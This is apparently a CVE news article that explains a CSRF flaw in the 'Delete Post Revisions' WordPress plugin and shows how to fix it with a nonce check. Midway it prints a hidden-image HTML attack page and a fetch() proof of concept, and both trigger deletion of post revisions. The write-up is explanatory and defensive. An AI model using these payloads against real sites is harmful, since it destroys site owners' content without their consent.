CVE CyberSecurity Database News

CVE-2023-48754 - CSRF Vulnerability in Delete Post Revisions for WordPress Explained

Poster -

CVE-2023-48754 is a Cross-Site Request Forgery (CSRF) vulnerability in the WordPress plugin called “Delete Post Revisions,” developed by Wap Nepal. This issue impacts all versions up through 4.6. If you use this plugin, your website is at risk — and attackers might be able to delete post revisions just by tricking a logged-in admin into clicking a malicious link.

In this long-read, we’ll break down how this vulnerability works, show a simple exploit, and tell you how to fix it. All code examples and explanations are exclusive and simplified for easy understanding.

What is CSRF?

Cross-Site Request Forgery (CSRF) tricks an authenticated user into submitting a request they didn’t intend. For example: You’re an admin, signed in to your WordPress dashboard. If you visit a malicious website, the attacker can make your browser send requests to your blog — like deleting important post revisions.

About Delete Post Revisions Plugin

Delete Post Revisions lets WordPress admins quickly clean up old post revisions to save database space — but this plugin wasn’t secured correctly. It didn’t check if the request to delete revisions was a legitimate action from the admin, or if it came from a sneaky third party.

Vulnerable versions: All up to 4.6
Official plugin page: WordPress.org - Delete Post Revisions

How the Vulnerability Works

Normally, sensitive actions in WordPress should have a special "nonce" field, which helps verify requests came from a real admin user. The Delete Post Revisions plugin did not require a valid nonce for the deletion operation.

Vulnerable Code

Here’s a simplified snippet representing the issue (from the plugin’s delete-post-revisions.php):

// Code to handle deletion - VULNERABLE
if (isset($_GET['dpr_delete'])) {
    delete_post_revisions_function(); // dangerous: no nonce, no auth!
}

Any logged-in admin who visits the plugin’s special URL immediately triggers deletion, even if they didn’t mean to.

Real World Exploit: Step-By-Step

An attacker can craft a simple HTML page that, when visited by an authenticated admin, triggers deletion.

Example Exploit (HTML)

<!-- Attacker's evil site -->
<html>
  <body>
    <h1>Surprise!</h1>
    <img src="https://victim-wordpress-site.com/wp-admin/options-general.php?page=delete-post-revisions&dpr_delete=1"; style="display:none;">
  </body>
</html>

How it works:

The <img> tag’s src URL points to the plugin’s delete endpoint on your site.

- If you’re logged in as an admin and visit this attacker’s page, your browser quietly sends a GET request to delete all your post revisions.

Proof-of-Concept (PoC)

Want to test this in a safe environment? Here’s a simple JavaScript version you (or an attacker) could run in the browser console when logged in:

fetch('/wp-admin/options-general.php?page=delete-post-revisions&dpr_delete=1', {
    credentials: 'include'
}).then(r => {
    if (r.ok) {
        alert('Revisions deleted!');
    }
});

References and Official Tracking

- WordPress Plugin Listing
- WPScan Advisory
- NVD Entry for CVE-2023-48754

How to Fix & Protect Yourself

1. Update the Plugin!
If the developer releases a patch — upgrade immediately.

2. Add Nonce Verification

Any plugin action that changes something should have a nonce check. Example fix

// Fixed version
if (isset($_GET['dpr_delete']) && check_admin_referer('dpr_delete_nonce')) {
    delete_post_revisions_function();
}

Then add the nonce field in the form

wp_nonce_field('dpr_delete_nonce');

3. Use a Security Plugin
Add extra security with plugins like Wordfence or Sucuri.

4. Restrict Admin Access
Never stay logged in as admin when you’re browsing the web, and always use strong unique passwords.

Conclusion

CVE-2023-48754 in Delete Post Revisions is a classic but dangerous CSRF bug — easy to exploit and capable of erasing valuable content history. As always, keep all your plugins up-to-date and watch out for suspicious links, even while logged in.

Stay protected, and keep your WordPress safe!

If you have more questions about this bug or want exclusive security guides, let us know.

Timeline

Published on: 11/30/2023 16:15:10 UTC
Last modified on: 12/06/2023 00:38:46 UTC